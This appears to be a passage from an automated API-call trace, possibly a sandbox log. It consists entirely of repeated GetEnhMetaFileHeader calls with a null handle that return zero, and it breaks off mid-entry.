GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
